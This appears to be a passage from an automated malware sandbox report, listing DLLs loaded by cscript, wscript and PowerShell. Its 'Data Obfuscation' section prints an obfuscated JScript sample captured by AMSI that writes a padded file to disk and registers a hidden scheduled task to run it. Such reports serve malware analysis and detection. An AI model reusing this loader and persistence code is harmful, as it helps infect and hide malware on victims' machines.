Source: C:\Windows\System32\cscript.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\cscript.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\cscript.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\cscript.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\cscript.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\cscript.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\cscript.exeSection loaded: scrobj.dllJump to behavior
Source: C:\Windows\System32\cscript.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\cscript.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\cscript.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Windows\System32\cscript.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\cscript.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
Source: C:\Windows\System32\wscript.exeSection loaded: edgegdi.dll
Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dll
Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dll
Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dll
Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dll
Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exeSection loaded: slc.dll
Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dll
Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\wscript.exeSection loaded: pcacli.dll
Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
Source: C:\Windows\System32\wscript.exeSection loaded: sfc_os.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: samlib.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\cscript.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\cscript.exeSection loaded: edgegdi.dllJump to behavior
Source: C:\Windows\System32\cscript.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\cscript.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\cscript.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\cscript.exeSection loaded: jscript.dllJump to behavior
Source: C:\Windows\System32\cscript.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\cscript.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\cscript.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\cscript.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\cscript.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\cscript.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\cscript.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\cscript.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\cscript.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\cscript.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\cscript.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\cscript.exeSection loaded: scrobj.dllJump to behavior
Source: C:\Windows\System32\cscript.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\cscript.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: samcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: samlib.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dll
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior

Data Obfuscation

barindex
Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.Sh!ll@t.jsAutomotiv! Equipm!n@wscript@sAction@TA%%APPDA@SERNAME%%USERDOMAIN%\\%U@t!Cr!a@tQui@!tFil!G@Conn!ct@TaskD!finitionR!gist!r@hPat@l!Op!nT!xtFi@utions Enabl!r.xmlSol@Sl!!p@idd!nH@gss!ttin@il!D!l!t!F@vailabl!StartWh!nA";eSASsVQ = bcYigXs["sp"+"l"+"it"]("@");YJuYW = eSASsVQ[rajkxn];for (var JHeoNw = 0; JHeoNw <= rajkxn; JHeoNw++) {YJuYW = YJuYW["su"+"bs"+"tr"](1)+YJuYW["su"+"bs"+"tr"](0,1);}return YJuYW.replace(/!/g, "e");}lyAsEr = C(1);RtQDPr = C(38);NPrmon = C(26);IgXwed = have(human+problem+dead+flow+steel+cover+fair+stead+middle+depend+describe+close+interest+teach+dear+student+desert+strong+solution+except+die+triangle+prove+invent+at+coat+stick+planet+save+turn+music+condition+segment+chance+would+branch+me+market+band+fall+got+nine+industry+tiny+heard+fear+never+ready+hundred+him+include+melody+whole+whether+fine+several+map+mountain+like+noon+rise+fell+sell+shape+picture+reason+very+notice+out+practice+small+happy+tool+wife+thousand+eat+world+us+measure+gone+floor+copy+boat+ten+choose+tie+drink+stretch+grass+lady+captain+especially+speak+between+crowd+tube+slip+enter+correct+port+imagine+art+happen+money+experiment+basic+most+them+silent+deep+said+create+air+plant+by+get);tFJLF = WScript;bDUZWc = tFJLF[C(21)](C(25));sUyzyW = tFJLF[C(21)](C(22));KuuiRw = tFJLF[C(21)](C(23));KuuiRw[C(34)]();wdYPqr = KuuiRw[C(2)]("\\");try{HTzPty = wdYPqr[C(13)](lyAsEr);}catch(MtFsMp){HTzPty = false;}if (HTzPty == false) {gnaen = sUyzyW[C(2)](bDUZWc[C(9)](C(29)))[C(3)];GDoit = 186-(Math[C(5)](186/gnaen[C(10)])*gnaen[C(10)]);LYTu = 0;ZFMMe = false;for(vGTugu = new Enumerator(gnaen); !vGTugu[C(11)](); vGTugu[C(19)]()) {yraIkr = vGTugu[C(6)]();if (GDoit==LYTu) ZFMMe = yraIkr;LYTu++;}if (ZFMMe != false) {LJeh = ZFMMe+"\\"+RtQDPr;if(!sUyzyW[C(16)](LJeh)){yMKUF = sUyzyW[C(37)](LJeh, 8, true);yMKUF[C(14)](IgXwed);LYTu=0;uRhM=IgXwed.length;while(true) {yMKUF[C(14)](IgXwed);LYTu=LYTu+uRhM;if (LYTu>4600000) break;}yMKUF[C(12)]();ReIJ = ZFMMe+"\\"+NPrmon;sUyzyW[C(24)](LJeh,ReIJ);sUyzyW[C(42)](LJeh);yMKUF = sUyzyW[C(33)](ReIJ);xpmXi = yMKUF[C(18)];YndsSIJ = KuuiRw[C(0)](0);YndsSIJ[C(41)][C(43)] = true;YndsSIJ[C(41)][C(40)] = false;yihCaP = YndsSIJ[C(17)][C(31)](9);yihCaP["ID"] = C(20);yihCaP[C(8)] = bDUZWc[C(9)](C(30));qFgubZX = YndsSIJ[C(28)][C(31)](0);qFgubZX[C(36)] = C(27);qFgubZX[C(15)] = xpmXi;qFgubZX[C(4)] = ZFMMe;wdYPqr[C(35)](lyAsEr, YndsSIJ, 6, "" , "" , 3);HTzPty = wdYPqr[C(13)](lyAsEr);tFJLF[C(39)](29717);HTzPty[C(7)](null, 2, 0, "");}}}tFJLF[C(32)]();

Hooking and other Techniques for Hiding and Protection

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
